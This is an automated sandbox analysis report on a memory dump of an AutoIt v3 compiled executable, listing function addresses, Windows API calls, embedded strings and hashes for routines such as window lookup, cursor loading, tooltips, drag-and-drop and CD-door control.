Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: ad4573c6563c824bee22fc34d6b253ede6039c9e71ae08ba86ea87b82bf92bd8
Instruction ID: 1699f9d323a69d31e89bd6226321faf0788b7fee0c3399de9f6439ffb16e9876
Opcode Fuzzy Hash: ad4573c6563c824bee22fc34d6b253ede6039c9e71ae08ba86ea87b82bf92bd8
Instruction Fuzzy Hash: A8B16E71A0020ADFDB24DFA8DD45BAE7BB5FB08714F105229FA15FB2A0DB74A841DB50

Function 00EFA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00EFA47A
__swprintf.LIBCMT ref: 00EFA51B
_wcscmp.LIBCMT ref: 00EFA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EFA583
_wcscmp.LIBCMT ref: 00EFA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00EFA5F6
GetDlgCtrlID.USER32(?), ref: 00EFA648
GetWindowRect.USER32(?,?), ref: 00EFA67E
GetParent.USER32(?), ref: 00EFA69C
ScreenToClient.USER32(00000000), ref: 00EFA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00EFA71D
_wcscmp.LIBCMT ref: 00EFA731
GetWindowTextW.USER32(?,?,00000400), ref: 00EFA757
_wcscmp.LIBCMT ref: 00EFA76B

Part of subcall function 00EC362C: _iswctype.LIBCMT ref: 00EC3634

Strings

%s%u, xrefs: 00EFA515

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: fd75f78ede2d13b84d75f9b3c2ccded94d033ace8e918b2e71ba701f10acf255
Instruction ID: 148a5470bd7cd3592149bb95df7155fe57d88c3e631e054ad5dbbc83c8b39dec
Opcode Fuzzy Hash: fd75f78ede2d13b84d75f9b3c2ccded94d033ace8e918b2e71ba701f10acf255
Instruction Fuzzy Hash: 3FA194B120420AABD714DF60C884FBAB7E8FF44354F049539FA99EA190D730E955CB92

Function 00EFAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00EFAF18
_wcscmp.LIBCMT ref: 00EFAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00EFAF51
CharUpperBuffW.USER32(?,00000000), ref: 00EFAF6E
_wcscmp.LIBCMT ref: 00EFAF8C
_wcsstr.LIBCMT ref: 00EFAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00EFAFD5
_wcscmp.LIBCMT ref: 00EFAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00EFB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00EFB055
_wcscmp.LIBCMT ref: 00EFB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00EFB08D
GetWindowRect.USER32(00000004,?), ref: 00EFB0F6

Strings

ThumbnailClass, xrefs: 00EFAFE0, 00EFB060
@, xrefs: 00EFAEF9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 087658a3586b01d1ba784d80b6870fba5ceab22e76af186a64b149b9f4c0e57a
Instruction ID: 5573450189e94f12669e8961e891b2b7399d0824e534c387dacf9ec2599ca4e9
Opcode Fuzzy Hash: 087658a3586b01d1ba784d80b6870fba5ceab22e76af186a64b149b9f4c0e57a
Instruction Fuzzy Hash: 538192721043099BDB15DF10C885FBA7BE8EF44318F18A469FE89AE095DB34DD4ACB61

Function 00EFABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00EFAC33

Strings

[CLASS:, xrefs: 00EFAC83
[HANDLE:, xrefs: 00EFAC3F
HANDLE=, xrefs: 00EFAC2C
[LAST, xrefs: 00EFACE0
ALL, xrefs: 00EFACC7
[ACTIVE, xrefs: 00EFAC20
CLASSNAME=, xrefs: 00EFAC70
REGEXP=, xrefs: 00EFAC48
ACTIVE, xrefs: 00EFAC0E
LAST, xrefs: 00EFABF8
[ALL, xrefs: 00EFACD9
[REGEXPTITLE:, xrefs: 00EFAC5B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b4e14c9680b8a89220fb82a073737c08c591c179cfb495fe666adc6e6918818c
Instruction ID: bf12937e1eff33201d621b389bf2e5dad5b51abcce1ce8ab428977a6c61dfea9
Opcode Fuzzy Hash: b4e14c9680b8a89220fb82a073737c08c591c179cfb495fe666adc6e6918818c
Instruction Fuzzy Hash: 1131E7B1648309AADB00FA60EE43EFEB7E49F14711F242029FA45790E1EF16AF08D553

Function 00F14FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00F15013
LoadCursorW.USER32(00000000,00007F00), ref: 00F1501E
LoadCursorW.USER32(00000000,00007F03), ref: 00F15029
LoadCursorW.USER32(00000000,00007F8B), ref: 00F15034
LoadCursorW.USER32(00000000,00007F01), ref: 00F1503F
LoadCursorW.USER32(00000000,00007F81), ref: 00F1504A
LoadCursorW.USER32(00000000,00007F88), ref: 00F15055
LoadCursorW.USER32(00000000,00007F80), ref: 00F15060
LoadCursorW.USER32(00000000,00007F86), ref: 00F1506B
LoadCursorW.USER32(00000000,00007F83), ref: 00F15076
LoadCursorW.USER32(00000000,00007F85), ref: 00F15081
LoadCursorW.USER32(00000000,00007F82), ref: 00F1508C
LoadCursorW.USER32(00000000,00007F84), ref: 00F15097
LoadCursorW.USER32(00000000,00007F04), ref: 00F150A2
LoadCursorW.USER32(00000000,00007F02), ref: 00F150AD
LoadCursorW.USER32(00000000,00007F89), ref: 00F150B8
GetCursorInfo.USER32(?), ref: 00F150C8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 77aefd4286e34254d19eaad263e91dc8c63d6dd5d877dcdf055b928fa2bbeb9c
Instruction ID: 4737a432cc31e6badfe4bd66a265ca825666de668406d1afa39800dd58c913ce
Opcode Fuzzy Hash: 77aefd4286e34254d19eaad263e91dc8c63d6dd5d877dcdf055b928fa2bbeb9c
Instruction Fuzzy Hash: E03118B1D0831EAADF109FB68C8999EBFE8FF08750F50453AA50CE7180DA7865409F91

Function 00F2A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2A259
DestroyWindow.USER32(?,?), ref: 00F2A2D3

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F2A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F2A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2A382
DestroyWindow.USER32(00000000), ref: 00F2A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EA0000,00000000), ref: 00F2A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2A3F4
GetDesktopWindow.USER32 ref: 00F2A40D
GetWindowRect.USER32(00000000), ref: 00F2A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F2A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F2A444

Part of subcall function 00EA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EA25EC

Strings

tooltips_class32, xrefs: 00F2A346, 00F2A3D4
0, xrefs: 00F2A26F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 0cf0689deba170fb9e89a1419ab801116d97cc6b61aec545032f72418023d3d2
Instruction ID: bf293264d4fd896b37200c13e6c2ddf8bb0a07a7f9d614e9dd14e1b5265455bb
Opcode Fuzzy Hash: 0cf0689deba170fb9e89a1419ab801116d97cc6b61aec545032f72418023d3d2
Instruction Fuzzy Hash: FD71CE75540209AFD720DF28DC48F6A7BF6FB89710F04452CFA859B2A0C7B1E906EB52

Function 00F2C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

DragQueryPoint.SHELL32(?,?), ref: 00F2C627

Part of subcall function 00F2AB37: ClientToScreen.USER32(?,?), ref: 00F2AB60
Part of subcall function 00F2AB37: GetWindowRect.USER32(?,?), ref: 00F2ABD6
Part of subcall function 00F2AB37: PtInRect.USER32(?,?,00F2C014), ref: 00F2ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00F2C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F2C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F2C6BE
_wcscat.LIBCMT ref: 00F2C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F2C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00F2C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00F2C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00F2C757
DragFinish.SHELL32(?), ref: 00F2C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F2C851

Strings

@GUI_DRAGFILE, xrefs: 00F2C800
@GUI_DROPID, xrefs: 00F2C77E
@GUI_DRAGID, xrefs: 00F2C7C9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: cfc1235f3249bd570ea70d3609412a200b97b07f12befc14365442b8e3fd9ae1
Instruction ID: 02b878482d2adb80a16fd37e6e9ce0d3320b953844fae9699701a4f352a1bf7a
Opcode Fuzzy Hash: cfc1235f3249bd570ea70d3609412a200b97b07f12befc14365442b8e3fd9ae1
Instruction Fuzzy Hash: F5618B71108305AFC711EF64DC85DAFBBF8EF89750F00092EF595A61A1DB70AA09DB92

Function 00F24392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F24424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F2446F

Strings

CHECK, xrefs: 00F2448F
EXISTS, xrefs: 00F244D8
GETITEMCOUNT, xrefs: 00F24551
ISCHECKED, xrefs: 00F245F2
GETTEXT, xrefs: 00F245C2
EXPAND, xrefs: 00F24521
GETTOTALCOUNT, xrefs: 00F24456
COLLAPSE, xrefs: 00F244B5
GETSELECTED, xrefs: 00F2457F
UNCHECK, xrefs: 00F2464B
SELECT, xrefs: 00F24620

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 9f914fbfe5c5ca98453a8fdcdf69f79adbe8a43a2c0ce13ba0d36c4b9271a0d5
Instruction ID: 061fdc4158fb42eb92b45380d2fd61f0983344ffdbfa0b0147c319b295d22315
Opcode Fuzzy Hash: 9f914fbfe5c5ca98453a8fdcdf69f79adbe8a43a2c0ce13ba0d36c4b9271a0d5
Instruction Fuzzy Hash: FE917D316043119BCB08EF10C451A6EB7E1AF9A350F04986CF8966B3A3CB75FD4ADB91

Function 00F2B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F2B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F291C2), ref: 00F2B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F2B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2B9C3
FreeLibrary.KERNEL32(?), ref: 00F2B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F2B9DF
DestroyIcon.USER32(?,?,?,?,?,00F291C2), ref: 00F2B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F2BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F2BA17

Part of subcall function 00EC2EFD: __wcsicmp_l.LIBCMT ref: 00EC2F86

Strings

.exe, xrefs: 00F2B84A
.dll, xrefs: 00F2B86D
.icl, xrefs: 00F2B82A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 073f1a0c34b23b711bfeccb7a1a43d7d3f21c846df8f60a2fc42cbaa396d69b3
Instruction ID: dbe72392f2991322eb31d59d9f3f7afdd13b2389bc2b6240ee3febbd54c2c08f
Opcode Fuzzy Hash: 073f1a0c34b23b711bfeccb7a1a43d7d3f21c846df8f60a2fc42cbaa396d69b3
Instruction Fuzzy Hash: 9E61F071900229BBEB14DF64DC41FBE7BB8EB08721F104129FE15E61C1DB74A985E7A0

Function 00F0A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

CharLowerBuffW.USER32(?,?), ref: 00F0A3CB
GetDriveTypeW.KERNEL32 ref: 00F0A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0A4C5

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

Strings

wait, xrefs: 00F0A482
open, xrefs: 00F0A3F2
closed, xrefs: 00F0A3DF, 00F0A3E8
close, xrefs: 00F0A3D1
close cd wait, xrefs: 00F0A4B0
set cd door , xrefs: 00F0A466
type cdaudio alias cd wait, xrefs: 00F0A443
open , xrefs: 00F0A427

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 3ca92d61ec61e63ff1cf47f3844f83bb6dd4cf1a8de7d71deaff49cb900e80dc
Instruction ID: cbdf054866e5fea3cbed82f6865ef21ac7326259a040beb3ffb2b31ae432093e
Opcode Fuzzy Hash: 3ca92d61ec61e63ff1cf47f3844f83bb6dd4cf1a8de7d71deaff49cb900e80dc
Instruction Fuzzy Hash: F5515F755043059FC700EF20C89196BB7F5EF89758F00986DF8966B2A2DB31ED0ADB52

Function 00EFF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00EDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00EFF8DF
LoadStringW.USER32(00000000,?,00EDE029,00000001), ref: 00EFF8E8

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

GetModuleHandleW.KERNEL32(00000000,00F65310,?,00000FFF,?,?,00EDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00EFF90A
LoadStringW.USER32(00000000,?,00EDE029,00000001), ref: 00EFF90D
__swprintf.LIBCMT ref: 00EFF95D
__swprintf.LIBCMT ref: 00EFF96E
_wprintf.LIBCMT ref: 00EFFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EFFA2E

Strings

Error: , xrefs: 00EFF9E5
Line %d (File "%s"):, xrefs: 00EFF957
%s (%d) : ==> %s: %s %s, xrefs: 00EFFA12
Line %d:, xrefs: 00EFF968
^ ERROR, xrefs: 00EFF9C3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 09c8b8d0b1127ec83dc6395375caabacdc9a478eeddf41beac9b7b790a75b701
Instruction ID: af880c535d64dbd97a5dc2b0ac9e80dac8ffe47f63a5f5e115d973c5f7216300
Opcode Fuzzy Hash: 09c8b8d0b1127ec83dc6395375caabacdc9a478eeddf41beac9b7b790a75b701
Instruction Fuzzy Hash: 2C41507280460DAACF04FBE0DD56EFEB7B9AF59310F501065F605BA092EA316F09CB61

Function 00F2BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F29207,?,?), ref: 00F2BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BA85
GlobalLock.KERNEL32(00000000), ref: 00F2BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00F2BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F29207,?,?,00000000,?), ref: 00F2BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F32CAC,?), ref: 00F2BAD7
GlobalFree.KERNEL32(00000000), ref: 00F2BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00F2BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F2BB36
DeleteObject.GDI32(00000000), ref: 00F2BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F2BB74

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 057dda9032cc238c8300f40ef0476126511b2a94cdc95dfb6c27cd248b8852bd
Instruction ID: 7579bd9e355d89a8be317cbe49f819c307f3d5490a1ea46f52a896f54d81ce0e
Opcode Fuzzy Hash: 057dda9032cc238c8300f40ef0476126511b2a94cdc95dfb6c27cd248b8852bd
Instruction Fuzzy Hash: 1F412A75510218EFDB219F65EC48EAA7BB8FF89B21F104068F906D7260D7709D06EB60

Function 00F0D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00F0DA10
_wcscat.LIBCMT ref: 00F0DA28
_wcscat.LIBCMT ref: 00F0DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F0DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00F0DA63
GetFileAttributesW.KERNEL32(?), ref: 00F0DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F0DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00F0DAA7

Strings

*.*, xrefs: 00F0DAE6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
